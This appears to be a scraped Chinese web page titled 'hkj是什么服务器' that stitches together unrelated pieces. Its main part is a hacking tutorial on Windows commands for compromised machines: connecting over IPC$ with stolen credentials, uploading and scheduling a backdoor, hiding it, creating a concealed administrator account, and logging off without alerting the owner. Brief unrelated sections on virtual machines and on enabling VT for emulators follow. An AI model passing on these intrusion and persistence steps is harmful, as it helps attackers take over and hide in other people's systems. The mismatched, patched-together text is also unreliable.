hkj是什么服务器

1. 入门DOS命令

大家在入侵时,一定会用到DOS命令的,它的功能非常的强大.今天我就对常用的DOS命令作个详细的解说.主要是给刚入门者和接触DOS命令少的朋友看的.下面我挑几个比较常用的给大家说说.
以windows2000为例,windows xp类同.

DIR
显示当前盘下的所有文件夹和文件.
比较常用的方法是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :

DIR c:\winnt\system32\systems.exe

则会显示:
2004-05-24 20:06 194,762 systems.exe
1 个文件 194,762 字节
0 个目录 4,658,597,888 可用字节

如果你没有上传成功,则显示如下:
驱动器 C 中的卷没有标签。
卷的序列号是 6458-3DB8
c:\winnt\system32\的目录
找不到文件

CD
改变当前目录
具体看一下下面的命令:
C:\>cd winnt //进入winnt文件夹

C:\winnt>cd system32 //进入system32 文件夹

C:\winnt\system32>cd.. //回到上一级目录

C:\winnt>cd..

C:\>
C:\>d: //进入D盘

D:\>e: //进入E盘

E:\>

del和deltree
DEL:删除文件.
看下面的命令:
C:\>del c:\xx\ww.txt //删除C盘的XX目录下的名叫WW的文件.

C:\>
C:\>del c:\xx\*.* //删除C盘的XX目录下所有文件

deltree
这个更具有破坏性,不但能删除所有文件,连文件夹也删除

C:\>deltree c:\winnt //删除C盘下的winnt所有文件和文件夹.
这个大家要小心使用.

attrid
显示和更改文件或文件夹属性.
文件或文件夹的属性有 隐藏,用字母H表示. 只读,用R表示. 存档,用A表示. 系统,用S表示
改变一个文件或文件夹属性, " + " 表示增加, " - ",表示去掉某个属性.
平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe
命令如下:
C:\>attrid +h c:\winnt\system32\systems.exe //这样在system32下就找不到systems.exe

C:\>attrid -h c:\winnt\system32\systems.exe //去掉systems.exe的隐藏属性


复制一个或多个文件到其它目录
比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,

C:\> c:\1.txt d:\vv\1.exe

比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了共享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:

C:\> c:\systems.exe \\肉鸡IP\d$

type
显示文件内容
我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP
命令如下:

C:\>type c:\xx\hack.txt
序号 开始IP地址 结束IP地址 国家/省/直辖市 城市/区县/组织
58 024.179.140.000 024.179.150.255 中国台湾省
80 061.013.000.000 061.013.255.255 中国台湾省
86 061.058.065.000 061.058.070.255 中国台湾省
87 061.059.160.000 061.059.255.255 中国台湾省
89 061.070.100.000 061.070.150.255 中国台湾省
1788 061.217.179.000 061.217.179.255 中国台湾省 台南市
1789 061.216.000.000 061.219.255.255 中国台湾省
1790 061.220.080.000 061.220.150.255 中国台湾省 台北市
1791 061.224.000.000 061.224.255.255 中国台湾省 台北市
1792 061.225.000.000 061.225.255.255 中国台湾省
3390 134.208.000.000 134.208.255.255 中国台湾省
3584 139.175.000.000 139.175.255.255 中国台湾省
3590 140.092.000.000 140.092.255.255 中国台湾省
3593 140.096.000.000 140.096.255.255 中国台湾省
3596 140.112.000.000 140.112.255.255 中国台湾省 台湾大学
C:\>

它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:

C:\>type c:\boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect

看出来没有?,我用的是XP系统.

这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.

ping
这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:
ping ip
ping 网址

下面P的是本站:

C:\>ping www.hf110.com

Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms

上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.

net use
在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接

net use \\肉鸡ip\ipc$ "密码" /user:"用户名"

连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).

D:\systems.exe \\肉鸡ip\c$ //这里它要开放共享,你才能上传.否则无法上传成功.

net time \\肉鸡ip //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10

at \\肉鸡ip 15:12 systems.exe //在15:12分,运行systems.exe

在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,
可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.

net user
查看用户或新建一个用户.
这是在我电脑上的截图

C:\>net user

\\BILLGATES 的用户帐户

---------------------------------------------------------------------
Guest guest1 HelpAssistant
SUPPORT_388945a0 yhkj
命令成功完成。

C:\>

上面是我所有的用户.
现在我新建一个setwell的用户,密码是123456, 截图如下

C:\>net user setwell 123456 /add
命令成功完成。

C:\>net localgroup administrators setwell /add //这条命令是加setwell为管理员
命令成功完成。

接下来我们再net user ,载图如下

C:\>net user

\\BILLGATES 的用户帐户

----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。

建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:

C:\>net user set$ 123456 /add
命令成功完成。

C:\>net localgroup administrators set$ /add
命令成功完成。

C:\>net user

\\BILLGATES 的用户帐户

-----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。

C:\>

看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:

C:\>net localgroup administrators
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权

成员

------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。

C:\>

看到没有,我们看到set$这个用户了.

如果要删除用户用这个命令:

C:\>net user setwell /delete

net start
1.启动某些服务
比如: net start telnet //启动telnet服务

2.查看当前启动了什么服务.看看我的电脑启动了什么服务:

C:\>net start
已经启动以下 Windows 服务:

Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger

这只是一部分服务.

net stop
停止某些服务.站长今天也说到了.我不多了.

net share
查看默认共享.也就是查看这些共享C$ D$ e$ f$ admin$ ipc$,这是系统默认的.我的全部关了,我
到肉鸡上截张图吧.

C:\Documents and Settings\Administrator>net share
D$ D:\ 默认共享
F$ F:\ 默认共享
ADMIN$ C:\WINNT 远程管理
C$ C:\ 默认共享
E$ E:\ 默认共享
命令成功完成。

C:\Documents and Settings\Administrator>

这个肉鸡的IPC$共享竟然关了.

net view
也是查看共享,但不是上面的默认共享了,还是来张截图吧.也是肉鸡的,

C:\Documents and Settings\Administrator>net view
服务器名称 注释

-------------------------------------------------------------------------------
\\17
\\HMZ
\\ZGH
命令成功完成。

C:\Documents and Settings\Administrator>

学DOS命令看起来有点烦,其实是挺容易学的.而且学好了,在入侵中,会起到举足轻重的作用.下次讲netstat 等命令.

netstat -an
使用这个命令可以察看到和本机的所有的连接.看一下在我电脑上的截图,

D:\>netstat -an

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 180.254.158.42:139 0.0.0.0:0 LISTENING
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1035 *:*
UDP 0.0.0.0:1037 *:*
UDP 0.0.0.0:1134 *:*
UDP 0.0.0.0:1136 *:*

Proto Local Address Foreign Address State
协议 本地端口及IP地址 远程端口及IP地址 状态

LISTENING 监听状态 表示等待对方连接

ESTABLISHED 正在连接着.

TCP 协议是TCP

UDP 协议是UDP

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
这个表示 利用tcp协议 本机ip(218.95.49.187通过端口:2935 和远程ip(218.89.0.231)端口:80连接

query
这个命令只有在开了3389端口(也不一定端口是3389,说不定改成别的端口了.严格讲应是开了远程终端服务)的机子,才能用上.我用1$的用户名上了一台3389机子,看一下截图:

c:\>query user
USERNAME SESSIONNAME ID STATE
administrator console 0 运行中
1$ rdp-tcp#2 1 运行中

看到上面没有,管理员也在,如果你要退出的话,就用如下命令:

logoff ID 这儿是logoff 1.

这是正常退出的.说到退出,还有一个办法,就是在开始---关机---注销1$.如果你用另外的方法退出的话,那么肉鸡在关机时,会出现类如"有一个其它客人登录到这台服务器,如果你退出,对方的会话数据会丢失"一类的话.这样管理员就会发现了.

2. 虚拟机是什么

虚拟机指通过软件模拟的具有完整硬件系统功能的、运行在一个完全隔离环境中的完整计算机系统。

虚拟系统通过生成现有操作系统的全新虚拟镜像，它具有真实windows系统完全一样的功能，进入虚拟系统后，所有操作都是在这个全新的独立的虚拟系统里面进行，可以独立安装运行软件。

保存数据，拥有自己的独立桌面，不会对真正的系统产生任何影响 ，而且具有能够在现有系统与虚拟镜像之间灵活切换的一类操作系统。

(2)hkj是什么服务器扩展阅读：

虚拟机的用处：

1、演示环境，可以安装各种演示环境，便于做各种例子。

2、保证主机的快速运行，减少不必要的垃圾安装程序，偶尔使用的程序，或者测试用的程序在虚拟机上运行。

3、避免每次重新安装，银行等常用工具，不经常使用，而且要求保密比较好的，单独在一个环境下面运行。

4、想测试一下不熟悉的应用，在虚拟机中随便安装和彻底删除。

5、体验不同版本的操作系统，如Linux、Mac等。

3. 模拟器开VT有什么好处和坏处

开VT的好处就是安卓模拟器能够得到更多的资源来运行游戏，为了游戏玩的爽，可以认为安卓模拟器是必须开VT的。而且VT没有坏处。

因此开启VT功能就会更好利用处理器的资源，发挥出电脑设备的全部作用，这项技术并不会对电脑设备带来坏的影响，能够支持VT功能反而表明你的设备足够先进，因为这项技术的普及是近几年的事情。